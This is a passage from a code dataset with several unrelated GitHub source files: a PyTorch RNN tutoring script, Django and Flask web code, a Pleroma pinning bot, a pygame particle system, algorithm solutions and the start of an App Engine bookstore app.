self.train_step(x_batch, y_batch)\n batch_losses.append(loss)\n training_loss = np.mean(batch_losses)\n self.train_losses.append(training_loss)\n\n with torch.no_grad():\n batch_val_losses = []\n for x_val, y_val in val_loader:\n x_val = x_val.view([batch_size, -1, n_features]).to(device)\n y_val = y_val.to(device)\n self.model.eval()\n yhat = self.model(x_val)\n val_loss = self.loss_fn(y_val, yhat).item()\n batch_val_losses.append(val_loss)\n validation_loss = np.mean(batch_val_losses)\n self.val_losses.append(validation_loss)\n\n if (epoch <= 10) | (epoch % 50 == 0):\n print(\n f\"[{epoch}/{n_epochs}] Training loss: {training_loss:.4f}\\t Validation loss: {validation_loss:.4f}\"\n )\n\n torch.save(self.model.state_dict(), model_path) \n \n def evaluate(self, test_loader, batch_size=1, n_features=1):\n with torch.no_grad():\n predictions = []\n values = []\n for x_test, y_test in test_loader:\n x_test = x_test.view([batch_size, -1, n_features]).to(device)\n y_test = y_test.to(device)\n self.model.eval()\n yhat = self.model(x_test)\n predictions.append(yhat.to(device).detach().numpy())\n #detach():gradient의 전파를 멈추는 역할\n values.append(y_test.to(device).detach().numpy())\n\n return predictions, values\n\n def plot_losses(self):\n plt.plot(self.train_losses, label=\"Training loss\")\n plt.plot(self.val_losses, label=\"Validation loss\")\n plt.legend()\n plt.title(\"Losses\")\n plt.show()\n plt.close()\n \n#%%\n#네트워크 생성\nimport torch.nn as nn\n\n'''\n#첫번째 (combined = torch.cat((input, hidden), 1) error)\n#Tensors must have same number of dimensions: got 3 and 2\n\n#RNN 모듈은 입력 및 은닉 상태로 작동하는 2개의 선형 계층이며, 출력 다음에 LogSoftmax 계층\nclass RNN(nn.Module):\n def __init__(self, input_size, hidden_size, output_size):\n super(RNN, self).__init__()\n\n self.hidden_size = hidden_size\n\n self.i2h = nn.Linear(input_size + hidden_size, hidden_size)\n self.i2o = nn.Linear(input_size + hidden_size, output_size)\n self.softmax = nn.LogSoftmax(dim=1)\n\n def forward(self, input, hidden):\n combined = torch.cat((input, hidden), 1)\n hidden = self.i2h(combined)\n output = self.i2o(combined)\n output = self.softmax(output)\n return output, hidden\n\n def initHidden(self):\n return torch.zeros(1, self.hidden_size)\n \n'''\n#%%\n'''\n#두번째\n#Sizes of tensors must match except in dimension 1. Expected size 64 but got size 3 for tensor number 1 in the list.\nclass RNN(nn.Module):\n def __init__(self, input_size, hidden_size, output_size, num_layers):\n super(RNN, self).__init__()\n\n self.hidden_size = hidden_size\n self.num_layers = num_layers\n self.i2h = nn.Linear(input_size + hidden_size, hidden_size)\n self.i2o = nn.Linear(input_size + hidden_size, output_size)\n self.softmax = nn.LogSoftmax(dim=1)\n\n def forward(self, input, hidden):\n combined = torch.cat((input, hidden), 1)\n hidden = self.i2h(combined)\n output = self.i2o(combined)\n output = self.softmax(output)\n return output, hidden\n\n #initHidden : 최초 RNN이 호출을 위해 state가 없을때 hidden vector를 생성\n def initHidden(self):\n return torch.zeros(self.num_layers, 1, self.hidden_size) \n''' \n#%%\n'''\n첫번재 시도에서 3개의 dimension이 필요하다고 해서 rnn모듈을 쓰지 않고 layer dim을 추가해서 모델을 만드려고 하는데, \nconcat 함수에서 차원이 맞지 않는 오류가 나타나는데 어떻게 해결할 수 있을까요?\n\n'''\nclass RNN(nn.Module):\n def __init__(self, input_size, hidden_size, output_size, num_layers):\n super(RNN, self).__init__()\n self.num_layers = num_layers\n self.hidden_size = hidden_size\n self.i2h = nn.Linear(input_size + hidden_size, hidden_size)\n self.i2o = nn.Linear(input_size + hidden_size, output_size)\n self.softmax = nn.LogSoftmax(dim=1)\n\n def forward(self, input, hidden):\n #input=input.view(self.num_layers,-1,self.hidden_size)->shape '[3, -1, 64]' is invalid for input of size 6784\n combined = torch.cat((input, hidden), 1)\n '''\n cat:원하는 dimension 방향으로 텐서를 나란하게 쌓아준다\n x = torch.rand(batch_size, N, K) # [M, N, K]\n y = torch.rand(batch_size, N, K) # [M, N, K]\n torch.cat([x,y], dim=1) #[M, N+N, K]\n '''\n \n ## 이 경우 hidden cell을 반복적으로 입력받도록 구현해야 하므로 hidden또한 return값에 포함해야 한다.\n hidden = self.i2h(combined)\n output = self.i2o(combined)\n output_softmax = self.softmax(output)\n return output_softmax, hidden\n\n #initHidden : 최초 RNN이 호출을 위해 state가 없을때 hidden vector를 생성\n def initHidden(self):\n return torch.zeros(self.num_layers, 1, self.hidden_size) \n \n #output : [batch_size, sequence, hidden_size]\n #h_0:(D∗num_layers,N(batch_size),H out(hidden_size))\n\n\na=torch.zeros(3,1,64)\na.shape #torch.Size([3, 1, 64])\nx_batch=train[0][0]\nx_batch = x_batch.view([1, -1, len(X_train.columns)])\nx_batch.shape #torch.Size([1, 1, 106])\n\n\n\n#%%\n#training\nimport torch.optim as optim\ninput_dim = len(X_train.columns)\ninput_dim #106\noutput_dim = 1\nhidden_dim = 64\nlearning_rate = 1e-3\nweight_decay = 1e-6\nn_epochs = 100\nlayer_dim = 3\nmodel = RNN(input_dim, hidden_dim, output_dim, layer_dim)\nloss_fn = nn.MSELoss(reduction=\"mean\")\n#mse로 loss 설정\noptimizer = optim.Adam(model.parameters(), lr=learning_rate, weight_decay=weight_decay)\nopt = Optimization(model=model, loss_fn=loss_fn, optimizer=optimizer)\nopt.train(train_loader, val_loader, batch_size=batch_size, n_epochs=n_epochs, n_features=input_dim)\n\nopt.plot_losses()\n\npredictions, values = opt.evaluate(test_loader_one, batch_size=1, n_features=input_dim)\n\n\n#%%\n#다차원 텐서를 1차원 벡터로 줄이기\ndef inverse_transform(scaler, df, columns):\n for col in columns:\n df[col] = scaler.inverse_transform(df[col])\n #inverse_transform:MinMaxScaler로 표준화된 데이터를 다시 원본 데이터로 복원\n return df\n\n\ndef format_predictions(predictions, values, df_test, scaler):\n vals = np.concatenate(values, axis=0).ravel()\n #np.ravel(x, order='C') : C와 같은 순서로 인덱싱하여 평평하게 배열 \n \n preds = np.concatenate(predictions, axis=0).ravel()\n df_result = pd.DataFrame(data={\"value\": vals, \"prediction\": preds}, index=df_test.head(len(vals)).index)\n df_result = df_result.sort_index()\n df_result = inverse_transform(scaler, df_result, [[\"value\", \"prediction\"]])\n return df_result\n\n\ndf_result = format_predictions(predictions, values, X_test, scaler)\n\n#%%\n#오차 지표 계산\nfrom sklearn.metrics import mean_absolute_error, mean_squared_error, r2_score\n\ndef calculate_metrics(df):\n return {'mae' : mean_absolute_error(df.value, df.prediction),\n 'rmse' : mean_squared_error(df.value, df.prediction) ** 0.5,\n 'r2' : r2_score(df.value, df.prediction)}\n\nresult_metrics = calculate_metrics(df_result)\n\n#%%\n#baseline 예측 생성 - 선형 회귀\nfrom sklearn.linear_model import LinearRegression\n\ndef build_baseline_model(df, test_ratio, target_col):\n X, y = feature_label_split(df, target_col)\n X_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=test_ratio, shuffle=False\n )\n model = LinearRegression()\n model.fit(X_train, y_train)\n prediction = model.predict(X_test)\n\n result = pd.DataFrame(y_test)\n result[\"prediction\"] = prediction\n result = result.sort_index()\n\n return result\n\ndf_baseline = build_baseline_model(df_features, 0.2, 'value')\nbaseline_metrics = calculate_metrics(df_baseline)\n\n#%%\n#예측 시각화\nimport plotly.offline as pyo\n\ndef plot_predictions(df_result, df_baseline):\n data = []\n \n value = go.Scatter(\n x=df_result.index,\n y=df_result.value,\n mode=\"lines\",\n name=\"values\",\n marker=dict(),\n text=df_result.index,\n line=dict(color=\"rgba(0,0,0, 0.3)\"),\n )\n data.append(value)\n\n baseline = go.Scatter(\n x=df_baseline.index,\n y=df_baseline.prediction,\n mode=\"lines\",\n line={\"dash\": \"dot\"},\n name='linear regression',\n marker=dict(),\n text=df_baseline.index,\n opacity=0.8,\n )\n data.append(baseline)\n \n prediction = go.Scatter(\n x=df_result.index,\n y=df_result.prediction,\n mode=\"lines\",\n line={\"dash\": \"dot\"},\n name='predictions',\n marker=dict(),\n text=df_result.index,\n opacity=0.8,\n )\n data.append(prediction)\n \n layout = dict(\n title=\"Predictions vs Actual Values for the dataset\",\n xaxis=dict(title=\"Time\", ticklen=5, zeroline=False),\n yaxis=dict(title=\"Value\", ticklen=5, zeroline=False),\n )\n\n fig = dict(data=data, layout=layout)\n iplot(fig)\n \n \n# Set notebook mode to work in offline\npyo.init_notebook_mode()\n\nplot_predictions(df_result, df_baseline)\n","repo_name":"qw-4735/tutoring","sub_path":"day7/SHS.py","file_name":"SHS.py","file_ext":"py","file_size_in_byte":19223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14925071550","text":"# -*- coding: utf-8 -*-\nfrom zipfile import ZipFile\n\nfrom celery.task import task\nfrom django.conf import settings\nfrom django.contrib.sites.models import Site\nfrom django.template.loader import render_to_string\nimport os\nfrom common.models import Burial\nfrom django.core.mail import EmailMessage\n\n@task\ndef report_2_deferred(burial_id, email):\n b = Burial.objects.get(pk=burial_id)\n msg = render_to_string('reports/report_2.html', {'burial': b})\n\n html_path = os.tempnam()\n html_path = html_path.replace('/tmp/', os.path.join(settings.MEDIA_ROOT, 'reports')) + '.html'\n\n if not os.path.exists(os.path.dirname(html_path)):\n os.makedirs(os.path.dirname(html_path))\n\n f = open(html_path, 'w')\n f.write(msg.encode('utf-8'))\n f.close()\n\n zip_path = html_path + '.zip'\n zip = ZipFile(zip_path, 'w')\n zip.write(html_path, 'report_2.html')\n zip.close()\n\n zip_url = zip_path.replace(settings.MEDIA_ROOT, settings.MEDIA_URL)\n body = u'http://%s%s' % (Site.objects.get_current().domain, zip_url)\n email = EmailMessage(subject=u'Форма 2', body=body, to=[email], from_email=settings.DEFAULT_FROM_EMAIL)\n email.send()\n\n os.unlink(html_path)\n # os.unlink(zip_path)\n\n return 'ok, %s, %s' % (html_path, zip_url)","repo_name":"6jlarogap/mil","sub_path":"common/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71956013051","text":"class Solution:\n def maxProbability(self, n: int, edges: List[List[int]], succProb: List[float], start: int, end: int) -> float:\n graph = defaultdict(list)\n \n for i in range(len(edges)):\n edge = edges[i]\n graph[edge[0]].append((succProb[i], edge[1]))\n graph[edge[1]].append((succProb[i], edge[0]))\n \n seen = set()\n heap = [(-1.0, start)]\n \n while heap:\n prob, node = heappop(heap)\n seen.add(node)\n \n if node == end:\n return -prob\n \n for (edge_prob, destination) in graph[node]:\n if destination in seen:\n continue\n \n heappush(heap, (edge_prob * prob, destination))\n \n return 0.0\n","repo_name":"JohnnyUrosevic/LeetCode","sub_path":"1514.py","file_name":"1514.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10724975554","text":"import pygame\nimport random\nfrom pygame.locals import *\n\nfrom locals import *\n\nclass Particle (pygame.sprite.Sprite):\n def __init__(self, position, vect, colour, acceleration, size, life, opacity, underwater = True):\n pygame.sprite.Sprite.__init__(self)\n\n self.rect = pygame.Rect(position[0], position[1], size, size)\n self.vect = vect\n self.colour = colour\n self.acceleration = acceleration\n self.initial_life = life\n self.life = life\n self.opacity = opacity\n self.underwater = underwater\n\n self.image = pygame.Surface([int(size), int(size)])#, SRCALPHA, 32)\n self.image.fill((255,0,255))\n self.image.set_colorkey((255,0,255))\n\n pygame.draw.ellipse(self.image, self.colour, self.image.get_rect())\n\n if Variables.alpha:\n self.image.set_alpha(self.life * 255 * self.opacity / self.initial_life)\n\n def update(self):\n self.rect.left += self.vect[0]\n self.rect.top += self.vect[1]\n self.vect[0] += self.acceleration[0]\n self.vect[1] += self.acceleration[1]\n if self.life > 0:\n self.life -= 1\n\n if not self.underwater and self.vect[1] > 0.0:\n self.life = 0\n\n if Variables.alpha:\n self.image.set_alpha(self.life * 255 * self.opacity / self.initial_life)\n\nclass Particles (pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n\n self.particles = []\n self.particle_sprites = pygame.sprite.Group()\n if Variables.alpha:\n self.image = pygame.Surface((SCREEN_WIDTH, SCREEN_HEIGHT), SRCALPHA, 32)\n else:\n self.image = pygame.Surface((SCREEN_WIDTH, SCREEN_HEIGHT))\n self.image.set_colorkey((255,0,255))\n self.rect = self.image.get_rect()\n\n def update(self):\n self.image.fill((255,0,255,0))\n \n self.particle_sprites.draw(self.image)\n\n for p in self.particles:\n p.update()\n if p.life <= 0:\n self.particles.remove(p)\n self.particle_sprites.remove(p)\n\n def add_blood_particle(self, position):\n particle = Particle(position, [random.random() * 5 - 2.5, random.random() * 5 - 2.5], [230, 30, 20], [0.0, 0.7], random.random() * 5.0 + 1.0, random.random() * 30, 1.0)\n self.particles.append(particle)\n self.particle_sprites.add(particle)\n\n def add_explosion_particle(self, position):\n particle = Particle(position, [random.random() * 5 - 2.5, random.random() * 5 - 2.5], [230, 30 + random.random() * 200, 20], [0.0, 0.2], random.random() * 7.0 + 1.0, random.random() * 30, 1.0)\n self.particles.append(particle)\n self.particle_sprites.add(particle)\n\n def add_water_particle(self, position):\n particle = Particle(position, [random.random() * 5 - 2.5, -random.random() * 2.5 - 2.0], (20,60,180), (0.0, 0.3), random.random() * 5.0 + 1.0, random.random() * 30, 0.5, underwater = False)\n self.particles.append(particle)\n self.particle_sprites.add(particle)\n\n def add_debris_particle(self, position):\n particle = Particle(position, [random.random() * 5 - 2.5, random.random() * 5 - 2.5], [90, 90, 90], [0.0, 0.2], random.random() * 7.0 + 1.0, random.random() * 30, 1.0)\n self.particles.append(particle)\n self.particle_sprites.add(particle)\n\n def add_wood_particle(self, position):\n particle = Particle(position, [random.random() * 5 - 2.5, random.random() * 5 - 2.5], [148, 69, 6], [0.0, 0.2], random.random() * 7.0 + 1.0, random.random() * 30, 1.0)\n self.particles.append(particle)\n self.particle_sprites.add(particle)\n\n def add_steam_particle(self, position):\n particle = Particle(position, [-random.random() * 0.3, -random.random() * 0.1], [240, 240, 240], [-0.1, -0.00002], random.random() * 10.0 + 1.0, random.random() * 30, 0.5)\n self.particles.append(particle)\n self.particle_sprites.add(particle)\n\n def add_fire_steam_particle(self, position):\n particle = Particle(position, [-random.random() * 0.3, -random.random() * 0.1], [255, 210, 170], [-0.1, -0.00002], random.random() * 11.0 + 1.0, random.random() * 30, 0.4, False)\n self.particles.append(particle)\n self.particle_sprites.add(particle)\n\n def add_trace_particle(self, position):\n particle = Particle(position, [0.0, 0.0], [170, 170, 170], [0.0, 0.0], 6.0, 5+random.random() * 5, 0.1+random.random()*0.1, False)\n self.particles.append(particle)\n self.particle_sprites.add(particle)\n","repo_name":"AMDmi3/funnyboat","sub_path":"particles.py","file_name":"particles.py","file_ext":"py","file_size_in_byte":4593,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"27856738144","text":"# https://school.programmers.co.kr/learn/courses/30/lessons/92341\n\n\nfrom collections import defaultdict\nfrom math import ceil\n\n\ndef solution(fees, records):\n total_parking_time = defaultdict(int)\n enter_car = {}\n for record in records:\n info = record.split()\n if info[2] == \"IN\":\n enter_car[info[1]] = convert_to_minute(info[0])\n else:\n parking_time = convert_to_minute(info[0]) - enter_car[info[1]]\n total_parking_time[info[1]] += parking_time\n del enter_car[info[1]]\n # 출차 기록이 없는 차들의 주차시간 계산\n end_time = convert_to_minute(\"23:59\")\n for key, item in enter_car.items():\n total_parking_time[key] += end_time - item\n\n total = []\n # 번호가 작은 순부터 꺼내기위해 key리스트를 정렬\n for key in sorted(total_parking_time.keys()):\n total_fee = fees[1] # 요금의 최소값은 기본 요금\n if total_parking_time[key] > fees[0]:\n total_fee += ceil((total_parking_time[key] - fees[0]) / fees[2]) * fees[3]\n total.append(total_fee)\n return total\n\n\ndef convert_to_minute(time):\n return int(time[:2]) * 60 + int(time[3:])\n\n\nprint(solution([180, 5000, 10, 600], [\"05:34 5961 IN\", \"06:00 0000 IN\", \"06:34 0000 OUT\", \"07:59 5961 OUT\",\n \"07:59 0148 IN\", \"18:59 0000 IN\", \"19:09 0148 OUT\", \"22:59 5961 IN\", \"23:00 5961 OUT\"]))\n","repo_name":"thecode00/Algorithm-Problem-Solve","sub_path":"Programmers/KAKAO BLIND RECRUITMENT/2022/주차 요금 계산/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11597544242","text":"from typing import Union, Tuple, List, TYPE_CHECKING\n\nfrom interfaces.windows import console_windows\nfrom utility import consoles\nimport utility.utilities as util\n\n\nif TYPE_CHECKING:\n from board import sprite_groups\n from machines.base_machine import Machine\n\n\nclass MachineConsole(console_windows.ConsoleWindow):\n COLOR: Union[Tuple[int, int, int, int], Tuple[int, int, int], List[int]] = (150, 150, 150, 255)\n SIZE: util.Size = util.Size(540, 500)\n\n _console: consoles.MachineConsole\n\n def __init__(\n self,\n pos: Union[Tuple[int, int], List[int]],\n sprite_group: \"sprite_groups.CameraAwareLayeredUpdates\",\n color=COLOR,\n static=True,\n title=\"MACHINE CONSOLE\",\n max_line_size=SIZE.width,\n **kwargs\n ):\n console_ = consoles.MachineConsole()\n super().__init__(pos, self.SIZE, sprite_group, console_, color=color, static=static, title=title,\n max_line_size=max_line_size, **kwargs)\n\n def set_machine(self, machine: \"Machine\"):\n self._console.set_machine(machine)\n","repo_name":"bramvanwersch/Machine_mining","sub_path":"python_code/machines/machine_terminal_interface.py","file_name":"machine_terminal_interface.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"75012351293","text":"from flask.views import MethodView\nfrom flask_smorest import Blueprint, abort\nfrom sqlalchemy.exc import SQLAlchemyError, IntegrityError\nfrom schemas import TypeSchema\nfrom models import TypeModel, PokemonModel\nfrom db import db\n\nblp = Blueprint(\"types\", __name__, description=\"Operations on types\")\n\n@blp.route(\"/type\")\nclass TypeList(MethodView):\n @blp.response(200, TypeSchema(many=True))\n def get(self):\n return TypeModel.query.all()\n \n @blp.arguments(TypeSchema)\n @blp.response(201, TypeSchema)\n def post(self, type_data):\n type = TypeModel(**type_data)\n\n try:\n db.session.add(type)\n db.session.commit()\n except IntegrityError:\n abort(400, message=\"The specified type already exists in the database!\")\n except SQLAlchemyError:\n abort(500, message=\"An error occurred while inserting the type\")\n\n return type\n\n@blp.route(\"/type/\")\nclass Type(MethodView):\n @blp.response(200, TypeSchema)\n def get(self,type_id):\n type = TypeModel.query.get_or_404(type_id)\n return type\n\n@blp.route(\"/pokemon//type/\")\nclass LinkTypetoPokemon(MethodView):\n @blp.response(201, TypeSchema)\n def post(self, pokemon_id, type_id):\n pokemon = PokemonModel.query.get_or_404(pokemon_id)\n type = TypeModel.query.get_or_404(type_id)\n\n pokemon.types.append(type)\n\n try:\n db.session.add(pokemon)\n db.session.commit()\n except SQLAlchemyError:\n abort(500, message=\"An error occurred while linking the type\")\n \n return type","repo_name":"EmpressEcho/pokeapi-challenge","sub_path":"resources/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15507435099","text":"import os\nfrom json.decoder import JSONDecodeError\n\nimport json\nimport requests\n\nfrom . import logger\nfrom .i18n import _\n\n\ndef pin_pleroma(self, id_post):\n \"\"\"Tries to unpin previous pinned post if a file containing the ID\n of the previous post exists, then proceeds to pin the post\n with ID 'id_post'\n\n :param id_post: ID of post to pin\n :returns: ID of post pinned\n :rtype: str\n \"\"\"\n pinned_file = os.path.join(self.user_path, \"pinned_id_pleroma.txt\")\n self.unpin_pleroma(pinned_file)\n\n pin_url = f\"{self.pleroma_base_url}/api/v1/statuses/{id_post}/pin\"\n response = requests.post(pin_url, headers=self.header_pleroma)\n logger.info(_(\"Pinning post:\\t{}\").format(str(response.text)))\n try:\n pin_id = json.loads(response.text)[\"id\"]\n except KeyError:\n pin_id = None\n pass\n return pin_id\n\n\ndef unpin_pleroma(self, pinned_file):\n \"\"\"\n Unpins post with the ID stored in the file passed as parameter\n :param pinned_file: path to file containing post ID\n\n \"\"\"\n pinned_file_twitter = os.path.join(self.user_path, \"pinned_id.txt\")\n previous_pinned_post_id = None\n if os.path.isfile(pinned_file):\n with open(os.path.join(pinned_file), \"r\") as file:\n previous_pinned_post_id = file.readline().rstrip()\n if previous_pinned_post_id == \"\":\n previous_pinned_post_id = None\n\n if previous_pinned_post_id:\n unpin_url = (\n f\"{self.pleroma_base_url}/api/v1/statuses/\"\n f\"{previous_pinned_post_id}/unpin\"\n )\n response = requests.post(unpin_url, headers=self.header_pleroma)\n if not response.ok:\n response.raise_for_status()\n logger.info(_(\"Unpinning previous:\\t{}\").format(response.text))\n else:\n logger.info(\n _(\n \"File with previous pinned post ID not found or empty. \"\n \"Checking last posts for pinned post...\"\n )\n )\n _find_pinned(self, pinned_file)\n logger.warning(_(\"Pinned post not found. Giving up unpinning...\"))\n # Clear pinned ids\n with open(pinned_file, \"w\") as file:\n file.write(\"\\n\")\n with open(pinned_file_twitter, \"w\") as file:\n file.write(\"\\n\")\n\n\ndef _find_pinned(self, pinned_file):\n page = 0\n headers_page_url = None\n while page < 10:\n if self.posts:\n for post in self.posts:\n if post[\"pinned\"]:\n with open(pinned_file, \"w\") as file:\n file.write(f'{post[\"id\"]}\\n')\n return self.unpin_pleroma(pinned_file)\n page += 1\n pleroma_posts_url = (\n f\"{self.pleroma_base_url}/api/v1/accounts/\"\n f\"{self.pleroma_username}/statuses\"\n )\n\n if headers_page_url:\n statuses_url = headers_page_url\n else:\n statuses_url = pleroma_posts_url\n response = requests.get(statuses_url, headers=self.header_pleroma)\n if not response.ok:\n response.raise_for_status()\n posts = json.loads(response.text)\n self.posts = posts\n try:\n links = requests.utils.parse_header_links(\n response.headers[\"link\"].rstrip(\">\").replace(\">,<\", \",<\")\n )\n for link in links:\n if link[\"rel\"] == \"next\":\n headers_page_url = link[\"url\"]\n except KeyError:\n break\n\n\ndef _get_pinned_tweet_id(self):\n \"\"\"Retrieves the pinned tweet by the user\n\n :returns: ID of currently pinned tweet\n \"\"\"\n url = (\n f\"{self.twitter_base_url_v2}/users/\"\n f\"by/username/{self.twitter_username}\"\n )\n params = {\n \"user.fields\": \"pinned_tweet_id\",\n \"expansions\": \"pinned_tweet_id\",\n \"tweet.fields\": \"entities\",\n }\n response = requests.get(\n url, headers=self.header_twitter, params=params, auth=self.auth\n )\n if not response.ok:\n response.raise_for_status()\n try:\n data = json.loads(response.text)\n pinned_tweet = data[\"includes\"][\"tweets\"][0]\n pinned_tweet_id = pinned_tweet[\"id\"]\n except (JSONDecodeError, KeyError):\n pinned_tweet_id = None\n pass\n return pinned_tweet_id\n\n\ndef get_pinned_tweet(self):\n return self.pinned_tweet_id\n","repo_name":"TrendingTechnology/pleroma-bot","sub_path":"pleroma_bot/_pin.py","file_name":"_pin.py","file_ext":"py","file_size_in_byte":4315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"72606231292","text":"from django.urls import path, reverse\nfrom django.conf import urls\nfrom . import views\n\nurlpatterns = [\n\tpath(\"register/\", views.register, name=\"register\"),\n\tpath(\"login/\", views.loginpage, name=\"login\"),\n\tpath(\"log_out/\", views.logout, name=\"log_out\"),\n\n\tpath(\"\", views.dashboard, name=\"home\"),\n\tpath(\"update_process//\", views.updateprocess, name='update_process'),\n\tpath(\"userenter/\", views.userenter, name=\"userenter\"),\n\tpath(\"update_user//\", views.updateuser, name=\"update_user\"),\n\tpath(\"enterprocess/\", views.EnterProcess, name=\"enterprocess\"),\n\tpath(\"user_views//\", views.userviews, name=\"user_views\"),#jahate namayeshe user ha ke be template edituser.html mifreste\n\tpath(\"delete_process//\", views.deleteProcess, name='delete_process'),\n\tpath(\"chart/\", views.chart, name=\"chart\"),\n\tpath(\"machine_view//\", views.machineview, name=\"machine_view\"),\n\tpath(\"machine_enter/\", views.machineenter, name=\"machine_enter\"),\n\tpath(\"update_machine//\", views.updatemachine, name=\"update_machine\"),\n]","repo_name":"alifeiz67/samsteel","sub_path":"company/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39535147244","text":"import os\nimport urllib\nimport random\n\nfrom google.appengine.api import users\nfrom google.appengine.ext import ndb\n\nimport jinja2\nimport webapp2\n\nJINJA_ENVIRONMENT = jinja2.Environment(\n loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),\n extensions=['jinja2.ext.autoescape'],\n autoescape=True)\n\nDEFAULT_GENRE = 'Non-fiction'\nDEFAULT_AUTHOR = 'zzzzzzzzzzz'\nDEFAULT_ERROR = 'false'\n\ndef genre_key(genre_name=DEFAULT_GENRE):\n \"\"\"Constructs a Datastore key for a Genre entity. We use genre_name as the key.\"\"\"\n return ndb.Key('Genre', genre_name.lower())\n\ndef cart_key(user):\n return ndb.Key('User', user)\n\nclass Book(ndb.Model):\n \"\"\"A main model for representing an individual Book entry.\"\"\"\n id = ndb.StringProperty(indexed=True) # uniquely defines a book\n author = ndb.StringProperty(indexed=True)\n title = ndb.StringProperty(indexed=False)\n price = ndb.FloatProperty(indexed=False)\n date = ndb.DateTimeProperty(auto_now_add=True)\n\nclass Cart(ndb.Model):\n book_id = ndb.StringProperty() # Does not store the entire book in the cart; only the id and genre\n book_genre = ndb.StringProperty()\n \nclass MainPage(webapp2.RequestHandler):\n\n def get(self): \n\n cookie_id = self.request.cookies.get('key') # if first time, then generate an cookie_id\n if cookie_id == None:\n cookie_id = str(random.randint(1000000000, 9999999999))\n \n user = users.get_current_user() # display different login info depending on whether the user has logged in\n if user:\n url = users.create_logout_url('/')\n nickname = user.nickname()\n hasLogin = True\n else:\n url = users.create_login_url('/')\n nickname = ''\n hasLogin = False \n \n genre_name = self.request.get('genre_name',\n DEFAULT_GENRE)\n genre_query = Book.query(\n ancestor=genre_key(genre_name.lower())).order(-Book.date)\n genre = genre_query.fetch(100)\n\n template_values = {\n 'genre': genre,\n 'genre_name': urllib.quote_plus(genre_name),\n 'url': url,\n 'nickname': nickname,\n 'hasLogin': hasLogin,\n }\n\n template = JINJA_ENVIRONMENT.get_template('index.html')\n self.response.write(template.render(template_values))\n self.response.headers.add_header('Set-Cookie', 'key=%s' % str(cookie_id)) \n\nclass EnterPage(webapp2.RequestHandler):\n def get(self):\n genre_name = self.request.get('genre_name', DEFAULT_GENRE)\n error = self.request.get('error', DEFAULT_ERROR)\n \n template_values = {\n 'genre_name': urllib.quote_plus(genre_name),\n 'error': urllib.quote_plus(error),\n }\n\n template = JINJA_ENVIRONMENT.get_template('enter.html')\n self.response.write(template.render(template_values))\n\nclass Enter(webapp2.RequestHandler):\n def post(self):\n genre_name = self.request.get('genre_name',\n DEFAULT_GENRE)\n book = Book(parent=genre_key(genre_name.lower()))\n\n book.author = self.request.get('author')\n book.title = self.request.get('title')\n query_param1 = {'genre_name': genre_name}\n \n def generateId(): # generate an unique id for each book, so that in the shopping cart we only need to store the id\n CHAR = [chr(i) for i in xrange(ord('A'), ord('Z')+1)] \\\n + [chr(i) for i in xrange(ord('a'), ord('z')+1)] \\\n + [chr(i) for i in xrange(ord('0'), ord('9')+1)]\n book_id = ''\n for i in xrange(20):\n book_id += CHAR[random.randint(0, len(CHAR) - 1)]\n return book_id\n \n book.id = generateId() \n \n is_float = True # check the validity of the price\n try:\n book.price = float(self.request.get('price')) \n except:\n is_float = False\n\n if book.author != '' and book.title != '' and is_float:\n book.put()\n self.redirect('/?' + urllib.urlencode(query_param1))\n else:\n query_param2 = {'error': 'true'}\n self.redirect('/enter?' + urllib.urlencode(query_param1) + '&' + urllib.urlencode(query_param2))\n\nclass DisplayPage(webapp2.RequestHandler):\n def get(self):\n genre_name = self.request.get('genre_name', DEFAULT_GENRE)\n genre_query = Book.query(\n ancestor=genre_key(genre_name.lower())).order(-Book.date)\n genre = genre_query.fetch(100)\n \n template_values = {\n 'genre': genre,\n 'genre_name': urllib.quote_plus(genre_name),\n }\n\n template = JINJA_ENVIRONMENT.get_template('display.html')\n self.response.write(template.render(template_values))\n\nclass Search(webapp2.RequestHandler):\n\n def get(self):\n genre_name = self.request.get('genre_name', DEFAULT_GENRE)\n author = self.request.get('author', DEFAULT_AUTHOR)\n author = author.lower()\n bookList = []\n genre_query = Book.query(\n ancestor=genre_key(genre_name.lower())).order(-Book.date)\n genre = genre_query.fetch(1000)\n if author != '':\n for book in genre:\n bookAuthor = book.author.lower()\n if bookAuthor.find(author) != -1:\n bookList.append(book)\n \n template_values = {\n 'bookList': bookList,\n 'genre_name': urllib.quote_plus(genre_name),\n 'author': urllib.quote_plus(author),\n }\n\n template = JINJA_ENVIRONMENT.get_template('search.html')\n self.response.write(template.render(template_values))\n\n def post(self):\n genre_name = self.request.get('genre_name', DEFAULT_GENRE)\n author = self.request.get('author')\n query_param1 = {'genre_name': genre_name}\n query_param2 = {'author': author}\n self.redirect('/search?' + urllib.urlencode(query_param1) + '&' + urllib.urlencode(query_param2))\n\nclass AddToCart(webapp2.RequestHandler):\n \n def post(self):\n user = users.get_current_user()\n if not user:\n user = self.request.cookies.get('key')\n else:\n user = user.email()\n books = self.request.get('book', allow_multiple=True) # get all the books that has been marked in the check box\n for book in books:\n cart = Cart(parent=cart_key(user))\n tokens = book.split('##')\n book_id, book_genre = tokens[0], tokens[1]\n cart.book_id = book_id # only store the book id and genre in the cart database\n cart.book_genre = book_genre\n cart.put()\n self.redirect('/cart?' + urllib.urlencode({'user': user}))\n\nclass 